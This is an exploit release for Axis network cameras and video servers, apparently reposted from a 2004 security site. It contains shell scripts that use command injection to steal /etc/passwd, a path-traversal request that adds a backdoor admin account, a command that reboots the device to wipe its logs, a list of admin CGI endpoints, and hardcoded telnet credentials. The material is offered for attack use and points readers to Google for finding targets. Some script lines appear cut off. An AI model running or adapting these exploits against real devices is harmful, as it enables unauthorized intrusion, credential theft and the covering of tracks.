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Axis Network Camera/Video Server Multiple Exp
来源:vfocus.net 作者:bashis 发布时间:2004-08-27  

Axis Network Camera/Video Server Multiple Remote Exploits

Vulnerable: Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server.

Included files (some is simple shell scripts):
axis-passwd.sh ........... Get /etc/passwd as 'anonymous viewer' v2.34/2.40
axis-wh00t.sh ............ Add admin account as 'anonymous viewer' v2.12-2.40 (whoops!)
axis-cgi.txt ............. [bonus] Not so mutch bugs here, but nice to know ;)
axis-storpoint-cd-E100.txt [bonus] Hardcoded l/p in Storepoint CD servers

----[ axis-passwd.sh ]----

# Get /etc/passwd from:
# Axis 2100/2110/2120/2420 Network Camera 2.34/2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)
# Problem:
# PARAMETER=`echo $QUERY_STRING | sed 's/\(^.*\)=.*$/\1/'`
# in 'virtualinput.cgi'
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet
# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
if [ ${#*} -ne 2 ]
printf "\nUsage: %s <ip> <port>\n\n" $0
exit 1
printf "+++ Sending request to %s:%d\n+++ Received:\n" $1 $2
printf "GET /axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60
HTTP/1.1\n\n" | nc $1 $2
printf "+++ Yeah, right.. for you maybe, but not for me ;->\n\n+++ Get the passwd
file now\n+++ Received:\n"
printf "GET /local/passwd HTTP/1.0\n\n" | nc $1 $2
printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"

----[ axis-wh00t.sh ]----

# Add admin account with l/p: wh00t/wh00t
# Axis 2100/2110/2120/2420 Network Camera 2.12-2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)
# Problem:
# POST action follows "/../"
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet
# 2.12 seems to very buggy version, it add wh00t account,
# but editcgi.cgi seems not to work..
# Yes, you can use 'editcgi.cgi' to edit /etc/passwd
# and change/add what you want, or browse around in filesystem.
# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
if [ ${#*} -ne 2 ]
printf "\nUsage: %s <ip> <port>\n\n" $0
exit 1
printf "+++ Sending request to %s:%d\n" $1 $2
printf "+++ If all went well, you should see the password file soon...\n+++ Received:\n\n"
printf "POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0\nContent-
Length: 250\nPragma: no-cache\n\nconf_Security_List=root%%3AADVO%%3A%%3A
$1 $2 > /dev/null
# Note.......^^^^^^^^^^^^^^^^^^^^^^
printf "GET /admin-bin/editcgi.cgi?file=/etc/passwd HTTP/1.0\nHost:\nAuthorization:
Basic d2gwMHQ6d2gwMHQ=\n\n" | nc $1 $2
# it's good to clear logfile, so let us reboot the device now
printf "GET /cgi-bin/admin/restart.cgi HTTP/1.0\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n"
| nc $1 $2 > /dev/null
printf "\n\n+++ You can edit file(s) and browse around filesystem with:\nhttp://$1/admin-
printf "+++ Login with wh00t/wh00t (yes, you can edit /etc/passwd)\n"
printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"

----[ axis-cgi.txt ]----

# Well, not so mutch bugs here, but nice to know.. ;)
# From version: 2.12 and newer.
# (All dosn't work with 2.12)

List all availible parameters.
> http://<device>/cgi-bin/admin/getparam.cgi
> http://<device>/cgi-bin/admin/getparam.cgi?root.Layout.OwnTitle

Set one parameter.
> http://<device>/cgi-bin/admin/setparam.cgi?root.Layout.OwnTitle=Lame%20stuff

# Note, Axis is changing 'cgi-bin' to 'axis-cgi'
/cgi-bin/admin/systemlog.cgi (show syslog)
/cgi-bin/admin/serverreport.cgi (use[full|less] reports)
/cgi-bin/admin/restart.cgi (restart device, also good to clear syslog)
/cgi-bin/admin/paramlist.cgi (get some config)
/cgi-bin/admin/getparam.cgi (shown above)
/cgi-bin/admin/setparam.cgi (shown above)
/cgi-bin/admin/factorydefault.cgi (hrmm.. ;)
/admin-bin/editcgi.cgi?file= (browse filesystem, edit any file)

----[ axis-storpoint-cd-E100.txt ]----

# Yeah, old product.. old version.. but.. hardcoded l/p, uhm?
# l: copyright p: mammalambalouie
# Note, this hardcoded l/p exist in other products and newer versions
# of software as well, but i have not done so mutch research about this.

$ telnet xxx.xxx.xxx.xxx
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.

AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000

AXIS StorPoint CD E100 network login: copyright
Password: mammalambalouie

AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000

Root> q
Connection closed by foreign host.

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